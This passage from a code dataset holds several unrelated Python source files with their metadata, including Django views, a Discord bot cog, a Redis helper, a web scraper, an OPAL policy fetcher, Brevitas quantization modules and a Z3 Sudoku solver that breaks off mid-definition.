get_class_from_frame(frame)\n\n\ndef get_stencil_name(frame, event, args) -> str:\n \"\"\"Get the name of the stencil from within a\n call to FrozenStencil.__call__\"\"\"\n name = getattr(\n frame.f_locals[\"self\"].stencil_object,\n \"__name__\",\n repr(frame.f_locals[\"self\"].stencil_object.options[\"name\"]),\n )\n return f\"{name}.__call__\"\n\n\ndef get_name_from_frame(frame, event, args) -> str:\n \"\"\"Static name from frame object\"\"\"\n return frame.f_code.co_name\n\n\n\"\"\" Dictionary of functions to retrieve the name of a marker\nfollowing different logic.\n\"\"\"\nname_op = {\n \"gt4py_stencil\": get_stencil_name,\n \"function\": get_name_from_frame,\n \"wrapper\": get_object_wrapper_name,\n}\n\n\ndef mark(frame, event, args):\n \"\"\"Hooks at each function call & exit to record a Mark.\"\"\"\n config = get_analysis_config()\n if event == \"call\":\n for fn_desc in config[\"nvtx_marks\"]:\n key = fn_desc[\"key\"]\n if frame.f_code.co_name == key[\"fn\"] and (\n key[\"file\"] is None or key[\"file\"] in frame.f_code.co_filename\n ):\n if \"name\" in fn_desc:\n name = fn_desc[\"name\"]\n elif \"name_op\" in fn_desc:\n name = name_op[fn_desc[\"name_op\"]](frame, event, args)\n else:\n raise RuntimeError(\"Unrecognized name operator\")\n cp.cuda.nvtx.RangePush(name)\n elif event == \"return\":\n for fn_desc in config[\"nvtx_marks\"]:\n key = fn_desc[\"key\"]\n if frame.f_code.co_name == key[\"fn\"] and (\n key[\"file\"] is None or key[\"file\"] in frame.f_code.co_filename\n ):\n cp.cuda.nvtx.RangePop()\n","sub_path":"analysis/tools/nvtx_markings.py","file_name":"nvtx_markings.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457877481","text":"import redis\nimport time\nimport json\n\nrs=redis.Redis(host='127.0.0.1', port=6379, db=0, decode_responses=True)\ncount=redis.Redis(host='127.0.0.1', port=6379, db=1, decode_responses=True)\n\n#验证key是否重复\ndef auth_key(uid):\n if rs.get(uid):\n return False\n else:\n return True\n\n#写入播放记录\ndef write_playrecording(ip, video_id):\n gid = ip + '-' + time.strftime(\"%H%M%S\", time.localtime())\n if auth_key(gid):\n jsonlist = {\n \"ip\":ip,\n \"vid\":video_id\n }\n jsonlist = json.dumps(jsonlist)\n rs.set(gid,jsonlist)\n\n#写入数据库\ndef write_db():\n redis_data = rs.keys()\n for i in data:\n print('写入数据',i)\n\n#获取全部数据\ndef get_alldata():\n data = rs.keys()\n alist = []\n for i in data:\n data = rs.get(i)\n jsondata = {\"key\":i,\"data\":data}\n alist.append(jsondata)\n return alist\n\ndef deldata(tab,key):\n if tab == 'rs':\n rs.delete(key)\n elif tab == 'count':\n count.delete(key)\n else:\n return EOFError\n\n#删除全部数据\ndef delalldata():\n data = rs.keys()\n for i in data:\n rs.delete(i)\n return True\n\ndef video_playcount(vid):\n #获取vid的数据\n viddata = count.get(vid)\n #查询vid是否存在\n if viddata:\n count.getset(vid, viddata + 1)\n else:\n count.set(vid, 1)\n\ndef video_playcount_getall():\n data = count.keys()\n alist = []\n for i in data:\n data = count.get(i)\n jsondata = {\"vid\":i,\"count\":data}\n alist.append(jsondata)\n return alist","sub_path":"app/redis_db/rediscf.py","file_name":"rediscf.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39627048","text":"from django.conf.urls import url\nfrom tracking.views import index, device, device_csv, get_vehicles, export_stop_start_points\n\n\nurlpatterns = [\n url(r'^$', index, name='tracking_index'),\n url(r'^device/(?P\\d+)$', device, name='tracking_device'),\n url(r'^devices\\.csv$', device_csv, name='tracking_device_csv'),\n url(r'^stop_start_points$', export_stop_start_points, name='stop_start_points_csv'),\n url(r'vehicle_data/', get_vehicles, name='get_fleet_vehicles'),\n]\n","sub_path":"tracking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531621455","text":"from ..core import *\r\nfrom ..vparsers import *\r\nfrom ..utils import *\r\n\r\n\r\nclass SupernovaStatusParser(ValueParser):\r\n \r\n def parse(self, value):\r\n return {\r\n \"status--avilable\": StatusParser.AVAILABLE,\r\n \"status--reserved\": StatusParser.RESERVED,\r\n \"status--sold\": StatusParser.SOLD\r\n }.get(value, None)\r\n \r\n\r\nclass BuildingParser(ValueParser):\r\n\r\n @indexerror_wrapper(return_value=None)\r\n def parse(self, text):\r\n return text.split(\" \")[-1]\r\n\r\n\r\nclass SupernovaParser(\r\n MultipleRequestsGeneratorMixin, MultipleSourcesMixin, \r\n MultipleRequestsLoaderMixin, BaseParser\r\n):\r\n url = \"https://lema15.pl/wp-content/themes/supernova/page-templates/AJAX.php\"\r\n method = \"POST\"\r\n fixed_data = { \"fn\": \"getPage\" }\r\n var_data = [ dict(number=i) for i in range(1, 9) ]\r\n middlewares = [ JSONMiddleware() ]\r\n parsers = {\r\n \"floor\": FloorParser(), \"price\": PriceParser(), \"area\": AreaParser(),\r\n \"int\": IntParser(), \"building\": BuildingParser()\r\n }\r\n \r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.filter_flats()\r\n\r\n def filter_flats(self):\r\n buildings = getattr(self, \"buildings\", None)\r\n if buildings is not None:\r\n records = [\r\n record for record in self.records\r\n if record[\"building\"] in buildings\r\n ]\r\n self.records = records\r\n\r\n def find_records(self, data):\r\n return data\r\n \r\n def parse_record(self, data):\r\n return {\r\n \"number\": data.get(\"number\", None),\r\n \"building\": self.parsers[\"building\"](data.get(\"stage_title\", None)),\r\n \"price\": self.parsers[\"price\"](data.get(\"total_brutto\", None)),\r\n \"area\": self.parsers[\"area\"](data.get(\"area\", None)),\r\n \"rooms\": self.parsers[\"int\"](data.get(\"rooms\", None)),\r\n \"floor\": self.parsers[\"floor\"](data.get(\"flight\", None)),\r\n \"status\": SupernovaStatusParser()(data.get(\"id_product_status\", {}).get(\"class\", None))\r\n }\r\n \r\n def modify_record(self, record, soup=None):\r\n record[\"fid\"] = \"{building}/{number}\".format(**record)\r\n record[\"plan\"] = \"https://lema15.pl/mieszkanie/{number}\".format(**record)\r\n return record\r\n\r\n\r\nclass SupernovaABEParser(SupernovaParser):\r\n buildings = [\"AB\", \"E\", \"D\"]","sub_path":"parsers/cordia/supernova.py","file_name":"supernova.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23259621","text":"import datetime\nfrom discord.ext import commands\nimport discord\nimport platform\n\n\nfrom base_folder.bot.utils.util_functions import success_embed, build_embed\nfrom base_folder.bot.utils.Permissions_checks import user, mod\nfrom base_folder.bot.utils.checks import check_args_datatyp, logging_to_channel_stdout, purge_command_in_channel\n\n\nclass UserCmds(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command(pass_context=True, name=\"profile\", brief=\"Your Profile\", usage=\"profile\")\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def profile(self, ctx):\n xp = await self.client.sql.get_text_xp(ctx.guild.id, ctx.author.id)\n lvl = await self.client.sql.get_lvl_text(ctx.guild.id, ctx.author.id)\n warnings = await self.client.sql.get_warns(ctx.guild.id, ctx.author.id)\n e = build_embed(\n author=ctx.author.display_name,\n author_img=ctx.author.avatar_url,\n timestamp=datetime.datetime.now(),\n footer=self.client.user.name\n )\n e.title = \"Your profile\"\n e.description = ctx.author.mention\n e.add_field(name=\"Writer rank\", value=f\"**#{lvl}** with {xp}/{int((lvl+1)**(1/float(1/4)))}XP\", inline=False)\n e.add_field(name=\"Warnings\", value=f\"You have {warnings} warning(s)!\")\n await ctx.send(embed=e)\n\n @commands.command(pass_context=True, name=\"server_info\", brief=\"Guild info\", usage=\"server_info\")\n @commands.guild_only()\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def server_info(self, ctx):\n e = build_embed(title=ctx.guild.name,\n author=self.client.user.name,\n author_img=self.client.user.avatar_url,\n thumbnail=ctx.guild.icon_url,\n description=\"Here are some infos about this guild\",\n timestamp=datetime.datetime.now()\n\n )\n e.add_field(name=\"Members\", value=ctx.guild.member_count)\n e.add_field(name=\"Owner\", value=ctx.guild.owner)\n e.add_field(name=\"Roles\", value=len(ctx.guild.roles))\n e.add_field(name=\"Created at\", value=ctx.guild.created_at)\n e.add_field(name=\"AFK channel\", value=ctx.guild.afk_channel)\n e.add_field(name=\"AFK timeout\", value=ctx.guild.afk_timeout)\n e.add_field(name=\"Emoji limit\", value=ctx.guild.emoji_limit)\n e.add_field(name=\"Bitrate limit\", value=ctx.guild.bitrate_limit)\n e.add_field(name=\"Filesize limit\", value=ctx.guild.filesize_limit)\n await ctx.send(embed=e)\n\n @commands.command(pass_context=True, name=\"leaderboard\", brief=\"Shows the leaderboard for text xp\",\n usage=\"leaderboard\")\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def leaderboard(self, ctx):\n lvl = []\n xp = []\n userlist = []\n ranks = await self.client.sql.leaderboard(ctx.guild.id)\n for user in ranks:\n userlist.append(user[2])\n lvl.append(user[1])\n xp.append(user[0])\n embed = discord.Embed(\n colour=ctx.author.colour,\n timestamp=datetime.datetime.utcnow()\n )\n embed.set_author(name=\"Leaderboard for the server\")\n embed.set_footer(text=f\"Requested by {ctx.author.display_name}\", icon_url=ctx.author.avatar_url)\n for index, u in enumerate(zip(userlist, lvl, xp), start=1):\n embed.add_field(\n name=f\"Rank {index} \",\n value=f\"User:\\t** <@{ u[0]}> **\\n Level:{str(u[1])} xp:{str(u[2])}\",\n inline=False\n )\n await ctx.send(embed=embed)\n\n @commands.command(pass_context=True, name=\"roleinfo\",\n brief=\"Info about a role\", usage=\"roleinfo @role\")\n @commands.guild_only()\n @mod()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def roleinfo(self, ctx, role: discord.Role = None):\n counter = 0\n for members in self.client.get_all_members():\n for i in members.roles:\n if role == i:\n counter += 1\n e = success_embed(self.client)\n e.description=f\"Here are some important info's about {role.mention}\"\n e.add_field(name=\"Members\", value=f\"Has {counter} members\", inline=True)\n e.add_field(name=\"Created at\", value=f\"Was created at \\n{role.created_at}\", inline=True)\n e.add_field(name=\"Color\", value=f\"Has this {role.color} color\", inline=True)\n e.add_field(name=\"Permissions\", value=f\"Shown as integers \\n{role.permissions}\", inline=True)\n e.add_field(name=\"Shown on the right\", value=f\"{role.hoist}\", inline=True)\n e.add_field(name=\"Is mentionable\", value=f\"{role.mentionable}\", inline=True)\n await ctx.send(embed=e)\n\n @commands.command(pass_context=True, name='stats', brief='Sends some bot stats', usage=\"stats\")\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def stats(self, ctx):\n pythonVersion = platform.python_version()\n dpyVersion = discord.__version__\n serverCount = str(len(self.client.guilds))\n memberCount = str(len(list(self.client.get_all_members())))\n embed = discord.Embed(title=f'{self.client.user.name} Stats', description='\\uFEFF', colour=ctx.author.colour)\n embed.add_field(name='Bot Version:', value=self.client.Version)\n embed.add_field(name='Python Version:', value=pythonVersion)\n embed.add_field(name='Discord.Py Version', value=dpyVersion)\n embed.add_field(name='Total Guilds:', value=serverCount)\n embed.add_field(name='Total Users:', value=memberCount)\n embed.add_field(name='Bot Developer:', value=\"<@322822954796974080>\")\n embed.add_field(name=\"Intents\", value=self.client.intents)\n embed.set_footer(text=f\"11tuvork28 | {self.client.user.name}\")\n embed.set_author(name=self.client.user, icon_url=self.client.user.avatar_url)\n await ctx.send(embed=embed)\n\n @commands.command(pass_context=True, name='ping', brief='Gets and sends bot latency', usage=\"ping\")\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def ping(self, ctx):\n await ctx.send(f\"Bot ping: **{round(self.client.latency * 1000)}ms**\")\n\n\ndef setup(client):\n client.add_cog(UserCmds(client))\n","sub_path":"base_folder/bot/modules/commands/infocommands.py","file_name":"infocommands.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116386965","text":"from gujianonline.views_base import *\n\n\n# 材料类型:列表\n@csrf_protect\n@log_in\n@xframe_options_exempt\ndef gjol_goods_type_list(request):\n # 菜单栏点击触发\n if (\"iframe_id\" in request.GET):\n return render(request, \"goods_type/list.html\")\n\n else: # table.render中的url跳转\n page = request.GET.get(\"page\")\n limit = request.GET.get(\"limit\")\n name = request.GET.get(\"name\", \"\").strip()\n\n raw_data = list(GJOL_Goods_Type.objects.filter(Q(is_del=0) & Q(name__contains=name)).values())\n page_inator = Paginator(raw_data, limit) # 分页\n contacts = page_inator.page(page) # 请求第几页数据\n data_list = [] # 最终返回的结果集合\n for contact in contacts:\n data_list.append(contact)\n\n res = {}\n res[\"code\"] = 0\n res[\"msg\"] = \"success\"\n res[\"data\"] = data_list\n res[\"count\"] = len(raw_data)\n return JsonResponse(res)\n\n\n# 材料类型:新增\n@csrf_protect\n@log_in\n@xframe_options_exempt\ndef gjol_goods_type_add(request):\n if request.method == 'GET':\n return render(request, \"goods_type/edit.html\", {\"path\": \"gjol_goods_type_add\"})\n\n else:\n name = request.POST.get('name')\n sort = request.POST.get('sort')\n remark = request.POST.get('remark')\n create_by = request.session.get('user_id')\n\n goods_type = GJOL_Goods_Type(\n name=name,\n sort=sort,\n remark=remark,\n create_by=create_by)\n goods_type.save()\n res = {\"msg\": \"新增成功!\"}\n return JsonResponse(res)\n\n\n# 材料类型:编辑\n@csrf_protect\n@log_in\n@xframe_options_exempt\ndef gjol_goods_type_edit(request):\n if request.method == 'GET':\n id = request.GET.get('id')\n raw_data = list(GJOL_Goods_Type.objects.filter(id=id).values())\n return render(request, \"goods_type/edit.html\", {\"goods_type_list\": raw_data, \"path\": \"gjol_goods_type_edit\"})\n\n else:\n id = request.POST.get('id')\n name = request.POST.get('name')\n sort = request.POST.get('sort')\n remark = request.POST.get('remark')\n GJOL_Goods_Type.objects.filter(id=id).update(\n name=name,\n sort=sort,\n remark=remark,)\n res = {\"msg\": \"编辑成功!\"}\n return JsonResponse(res)","sub_path":"gujianonline/views/v_goods_type.py","file_name":"v_goods_type.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62983741","text":"import shutil # 高级的文件、文件夹、压缩包处理模块\n\nfsrc = open(\"doc/src.txt\", mode=\"r\", encoding=\"utf-8\")\nfdst = open(\"doc/des.txt\", mode=\"w\", encoding=\"utf-8\")\nshutil.copyfileobj(fsrc, fdst, length=16*1024) # 拷贝文件对象,每次读16*1024\nshutil.copyfile(\"doc/src2.txt\", \"doc/des2.txt\") # 不用打开文件,直接copy\n\n\n\n#shutil.copymode(\"doc/src2.txt\", \"doc/des2.txt\") # 仅拷贝权限,不拷贝内容\n#shutil.copystat(\"doc/src2.txt\", \"doc/des2.txt\") # 拷贝权限、状态(创建时间等)\nshutil.copy(\"doc/src3.txt\", \"doc/des3.txt\") # 拷贝文件和权限\n#shutil.copy2(\"doc/src3.txt\", \"doc/des3.txt\") # 拷贝文件和状态\n#shutil.copytree(\"doc/src3.txt\", \"doc/des3.txt\") # 递归拷贝,和shutil.ignore_patterns()配合可以过滤一些文件,例如:\n#copytree(source, destination, ignore=shutil.ignore_patterns('*.pyc', 'tmp*'))\n#shutil.rmtree(path[, ignore_errors[, onerror]]) # 递归的去删除文件\n#shutil.move(src, dst) # 递归的去移动文件\n\n'''\nshutil.make_archive(base_name, format,...)\n\n创建压缩包并返回文件路径,例如:zip、tar\n\nbase_name: 压缩包的文件名,也可以是压缩包的路径。只是文件名时,则保存至当前目录,否则保存至指定路径,\n如:www =>保存至当前路径\n如:/Users/wupeiqi/www =>保存至/Users/wupeiqi/\nformat:\t压缩包种类,“zip”, “tar”, “bztar”,“gztar”\nroot_dir:\t要压缩的文件夹路径(默认当前目录)\nowner:\t用户,默认当前用户\ngroup:\t组,默认当前组\nlogger:\t用于记录日志,通常是logging.Logger对象\n'''\nret = shutil.make_archive(\"doc/src\", 'gztar', root_dir='E:/workspace_python/first/foundation/mymodule/doc')\n\n# shutil 对压缩包的处理是调用 ZipFile 和 TarFile 两个模块来进行的,详细:\nimport zipfile\n\n# 压缩\nz = zipfile.ZipFile('doc/laxi.zip', 'w')\nz.write('doc/src.txt')\nz.write('doc/src2.txt')\nz.close()\n\n# 解压\nz = zipfile.ZipFile('doc/laxi.zip', 'r')\nz.extractall()\nz.close()\n\nimport tarfile # 仅打包,不���缩\n\n# 打包\ntar = tarfile.open(\"doc/test.tar\", \"w\")\ntar.add(\"doc/laxi.zip\")\ntar.add(\"doc/laxi2.zip\")\ntar.close()\n\n#解包\ntar = tarfile.open(\"doc/test.tar\", \"r\")\ntar.extractall(\"doc\") # 设置解包地址\ntar.close()\n","sub_path":"foundation/mymodule/4shutil.py","file_name":"4shutil.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544155365","text":"import aiohttp\n\nfrom typing import List, Optional\nfrom pydantic import ValidationError\nfrom fastapi import status, HTTPException\nfrom tenacity import retry, wait, stop\n\nfrom opal_common.utils import get_authorization_header\nfrom opal_common.schemas.policy import PolicyBundle\nfrom opal_client.utils import tuple_to_dict\nfrom opal_client.logger import logger\nfrom opal_client.config import opal_client_config\n\n\ndef force_valid_bundle(bundle) -> PolicyBundle:\n try:\n return PolicyBundle(**bundle)\n except ValidationError as e:\n logger.warning(\"server returned invalid bundle: {err}\", bundle=bundle, err=repr(e))\n raise\n\nasync def throw_if_bad_status_code(response: aiohttp.ClientResponse, expected: List[int]) -> aiohttp.ClientResponse:\n if response.status in expected:\n return response\n\n # else, bad status code\n details = await response.json()\n logger.warning(\"Unexpected response code {status}: {details}\", status=response.status, details=details)\n raise ValueError(f\"unexpected response code while fetching bundle: {response.status}\")\n\nclass PolicyFetcher:\n \"\"\"\n fetches policy from backend\n \"\"\"\n DEFAULT_RETRY_CONFIG = {\n 'wait': wait.wait_random_exponential(max=10),\n 'stop': stop.stop_after_attempt(5),\n 'reraise': True,\n }\n\n def __init__(self, backend_url=None, token=None, retry_config=None):\n \"\"\"\n Args:\n backend_url (str): Defaults to opal_client_config.SERVER_URL.\n token ([type], optional): [description]. Defaults to opal_client_config.CLIENT_TOKEN.\n \"\"\"\n self._token = token or opal_client_config.CLIENT_TOKEN\n self._backend_url = backend_url or opal_client_config.SERVER_URL\n self._auth_headers = tuple_to_dict(get_authorization_header(self._token))\n self._retry_config = retry_config if retry_config is not None else self.DEFAULT_RETRY_CONFIG\n self._policy_endpoint_url = f\"{self._backend_url}/policy\"\n\n @property\n def policy_endpoint_url(self):\n return self._policy_endpoint_url\n\n async def fetch_policy_bundle(\n self,\n directories: List[str] = ['.'],\n base_hash: Optional[str] = None\n ) -> Optional[PolicyBundle]:\n attempter = retry(**self._retry_config)(self._fetch_policy_bundle)\n try:\n return await attempter(directories=directories, base_hash=base_hash)\n except Exception as err:\n logger.warning(\"Failed all attempts to fetch bundle, got error: {err}\", err=repr(err))\n raise\n\n async def _fetch_policy_bundle(\n self,\n directories: List[str] = ['.'],\n base_hash: Optional[str] = None\n ) -> Optional[PolicyBundle]:\n \"\"\"\n Fetches the bundle. May throw, in which case we retry again.\n \"\"\"\n params = {\"path\": directories}\n if base_hash is not None:\n params[\"base_hash\"] = base_hash\n async with aiohttp.ClientSession() as session:\n try:\n async with session.get(\n self._policy_endpoint_url,\n headers={'content-type': 'text/plain', **self._auth_headers},\n params=params\n ) as response:\n if response.status == status.HTTP_404_NOT_FOUND:\n logger.warning(\"requested paths not found: {paths}\", paths=directories)\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"requested path {self._policy_endpoint_url} was not found in the policy repo!\"\n )\n\n\n # may throw ValueError\n await throw_if_bad_status_code(response, expected=[status.HTTP_200_OK])\n\n # may throw Validation Error\n bundle = await response.json()\n return force_valid_bundle(bundle)\n except aiohttp.ClientError as e:\n logger.warning(\"server connection error: {err}\", err=repr(e))\n raise\n\n","sub_path":"opal_client/policy/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70072703","text":"# ~*~ coding: utf-8 ~*~\nfrom __future__ import unicode_literals\nimport time\nimport json\nfrom datetime import datetime\n\nfrom django.conf import settings\nfrom django.views.generic import ListView, DetailView, View\nfrom django.utils import timezone\nfrom django.shortcuts import redirect, reverse\n\nfrom .models import Task\nfrom ops.tasks import rerun_task\n\n\nclass TaskListView(ListView):\n paginate_by = settings.CONFIG.DISPLAY_PER_PAGE\n model = Task\n ordering = ('-date_start',)\n context_object_name = 'task_list'\n template_name = 'ops/task_list.html'\n date_format = '%m/%d/%Y'\n keyword = date_from_s = date_to_s = ''\n\n def get_queryset(self):\n date_now = timezone.localtime(timezone.now())\n date_to_default = date_now.strftime(self.date_format)\n date_from_default = (date_now - timezone.timedelta(7)) \\\n .strftime(self.date_format)\n\n self.queryset = super(TaskListView, self).get_queryset()\n self.keyword = self.request.GET.get('keyword', '')\n self.date_from_s = self.request.GET.get('date_from', date_from_default)\n self.date_to_s = self.request.GET.get('date_to', date_to_default)\n\n if self.date_from_s:\n date_from = datetime.strptime(self.date_from_s, self.date_format)\n date_from = date_from.replace(tzinfo=timezone.get_current_timezone())\n self.queryset = self.queryset.filter(date_start__gt=date_from)\n\n if self.date_to_s:\n date_to = timezone.datetime.strptime(\n self.date_to_s + ' 23:59:59', '%m/%d/%Y %H:%M:%S')\n date_to = date_to.replace(tzinfo=timezone.get_current_timezone())\n self.queryset = self.queryset.filter(date_finished__lt=date_to)\n\n if self.keyword:\n self.queryset = self.queryset.filter(\n name__icontains=self.keyword,\n )\n return self.queryset\n\n def get_context_data(self, **kwargs):\n context = {\n 'app': 'Ops',\n 'action': 'Task record list',\n 'date_from': self.date_from_s,\n 'date_to': self.date_to_s,\n 'keyword': self.keyword,\n }\n kwargs.update(context)\n return super(TaskListView, self).get_context_data(**kwargs)\n\n\nclass TaskDetailView(DetailView):\n model = Task\n template_name = 'ops/task_detail.html'\n\n def get_context_data(self, **kwargs):\n context = {\n 'app': 'Ops',\n 'action': 'Task record detail',\n 'results': json.loads(self.object.summary or '{}'),\n }\n kwargs.update(context)\n return super(TaskDetailView, self).get_context_data(**kwargs)\n\n\nclass TaskRunView(View):\n pk_url_kwarg = 'pk'\n\n def get(self, request, *args, **kwargs):\n pk = kwargs.get(self.pk_url_kwarg)\n rerun_task.delay(pk)\n time.sleep(0.5)\n return redirect(reverse('ops:task-detail', kwargs={'pk': pk}))\n","sub_path":"jumpserver-dev/apps/ops/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155723641","text":"# Copyright (C) 2023, Advanced Micro Devices, Inc. All rights reserved.\n# SPDX-License-Identifier: BSD-3-Clause\n\n\nimport torch\nfrom torch import Tensor\nfrom torch.nn import Module\n\nimport brevitas\nfrom brevitas.function.ops_ste import tensor_clamp_ste\nfrom brevitas.core.utils import StatelessBuffer\n\n\nclass BitWidthConst(brevitas.jit.ScriptModule):\n \"\"\" \n ScriptModule that returns a constant bit-width wrapped in a float torch.tensor.\n\n Args:\n bit_width (int): bit-width value.\n\n Examples:\n >>> bit_width = BitWidthConst(8)\n >>> bit_width()\n tensor(8.)\n\n Note:\n The bit-width is not part of the Module's state, meaning that it won't be saved as part of\n a checkpoint.\n\n Note:\n Maps to bit_width_impl_type == BitWidthImplType.CONST == 'CONST' == 'const' in higher-level APIs.\n \"\"\"\n def __init__(self, bit_width: int) -> None:\n super(BitWidthConst, self).__init__()\n assert isinstance(bit_width, int)\n self.bit_width = StatelessBuffer(torch.tensor(float(bit_width)))\n\n @brevitas.jit.script_method\n def forward(self) -> Tensor:\n return self.bit_width()\n\n\nclass MsbClampBitWidth(brevitas.jit.ScriptModule):\n\n def __init__(\n self,\n bit_width_to_remove_impl: Module,\n min_overall_bit_width: int,\n max_overall_bit_width: int) -> None:\n super(MsbClampBitWidth, self).__init__()\n\n self.min_overall_bit_width = BitWidthConst(min_overall_bit_width)\n self.max_overall_bit_width = BitWidthConst(max_overall_bit_width)\n self.bit_width_to_remove_impl = bit_width_to_remove_impl\n\n @brevitas.jit.script_method\n def forward(self, input_bit_width: Tensor) -> Tensor:\n bit_width_to_remove = self.bit_width_to_remove_impl()\n output_bit_width = torch.abs(input_bit_width - bit_width_to_remove)\n output_bit_width = tensor_clamp_ste(\n output_bit_width,\n self.min_overall_bit_width(),\n self.max_overall_bit_width())\n return output_bit_width","sub_path":"src/brevitas/core/bit_width/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522743479","text":"from selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nclass Login:\n def login(self):\n self.options = Options()\n self.options.add_argument('--no-sandbox')\n self.options.add_argument('--disable-dev-shm-usage')\n self.options.add_argument('--headless')\n # 实例化浏览器\n self.d = webdriver.Chrome(chrome_options=self.options)\n # 打开登录界面\n self.d.get(\"http://localhost\")\n # WebDriverWait(self.d,60.1).until(lambda ele:self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[1]/div/div/input'))\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[1]/div/div/input').clear()\n # sleep(1)\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[1]/div/div/input').send_keys(\"admin\")\n # sleep(1)\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[2]/div/div/input').clear()\n # sleep(1)\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[2]/div/div/input').send_keys('admin')\n # sleep(1)\n #点击提交登录系统\n self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/div[2]/form/div[3]/div/button').click()\n sleep(2)","sub_path":"common/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129709509","text":"\n\n# Will Frazier\n# Adapted from Prof. Kfoury \n\nfrom z3 import * \n\n# The 9x9 grid, together with the 9 possible digits in each cell,\n# is represented by a 9x9x9 matrix S of Boolean values :\nS = [ [ [ Bool(\"s_%s_%s_%s\" % (i+1, j+1, k+1)) for k in range(9) ]\n for j in range(9) ]\n for i in range(9) ]\n\n# CONSTRAINT: Each cell contains a digit in {1, ..., 9} :\ncell_constraint = [ Or([ S[i][j][k] for k in range(9) ])\n for i in range(9) for j in range(9) ]\n\n# CONSTRAINT: Each row contains the same digit at most once :\nrow_constraint = [ And( Not( And( S[i][j][k], S[p][j][k] )))\n for j in range(9) for k in range(9)\n for i in range(8) for p in range(i+1,9) ]\n\n# CONSTRAINT: Each column contains the same digit at most once :\ncolumn_constraint = [ And( Not( And( S[i][j][k], S[i][p][k] )))\n for i in range(9) for k in range(9)\n for j in range(8) for p in range(j+1,9) ]\n\n# CONSTRAINT: Each 3x3 sub-grid contains a digit at most once :\nsq_constraintA = [ And( Not( And( S[3*p+i][3*q+j][k], S[3*p+i][3*q+r][k])))\n for k in range(9) for p in range(3) for q in range(3)\n for i in range(3) for j in range(3) for r in range(j+1,3) ]\n\nsq_constraintB = [ And( Not( And( S[3*p+i][3*q+j][k], S[3*p+r][3*q+n][k])))\n for k in range(9) for p in range(3) for q in range(3)\n for i in range(3) for j in range(3) for r in range(i+1,3)\n for n in range(3) ]\n\n# Combine the 5 preceding constraints into a single CONSTRAINT :\nsudoku_constraint = cell_constraint + row_constraint + column_constraint \\\n + sq_constraintA + sq_constraintB\n\n# An initial Sudoku instance is here encoded as a two-dimensional matrix.\n# For other initial Sudoku instances, you need to modify the matrix 'instance'.\n\n# An initial Sudoku instance, where '0' denotes an empty cell :\n\"\"\"\n#instance = ((0,0,0,0,9,4,0,3,0),\n# (0,0,0,5,1,0,0,0,7),\n# (0,8,9,0,0,0,0,4,0),\n# (0,0,0,0,0,0,2,0,8),\n# (0,6,0,2,0,1,0,5,0),\n# (1,0,2,0,0,0,0,0,0),\n# (0,7,0,0,0,0,5,2,0),\n# (9,0,0,0,6,5,0,0,0),\n# (0,4,0,9,7,0,0,0,0))\n\n\n#instance = ((1,0,0,0,9,4,0,3,0),\n# (0,0,0,5,1,0,0,0,7),\n# (0,8,9,0,0,0,0,4,0),\n# (0,0,0,0,0,0,2,0,8),\n# (0,6,0,2,0,1,0,5,0),\n# (1,0,2,0,0,0,0,0,0),\n# (0,7,0,0,0,0,5,2,0),\n# (9,0,0,0,6,5,0,0,0),\n# (0,4,0,9,7,0,0,0,0))\n\n\n\n\n# Another initial Sudoku instance :\ninstance = ((0,0,0,7,0,0,0,9,1),\n (0,3,1,0,0,8,0,0,0),\n (0,0,0,0,1,6,3,0,0),\n (0,9,0,0,0,0,0,8,4),\n (0,0,0,8,0,5,0,0,0),\n (6,4,0,0,0,0,0,7,0),\n (0,0,6,5,8,0,0,0,0),\n (0,0,0,1,0,0,7,3,0),\n (2,8,0,0,0,9,0,0,0))\n\n# Another initial Sudoku instance :\ninstance = 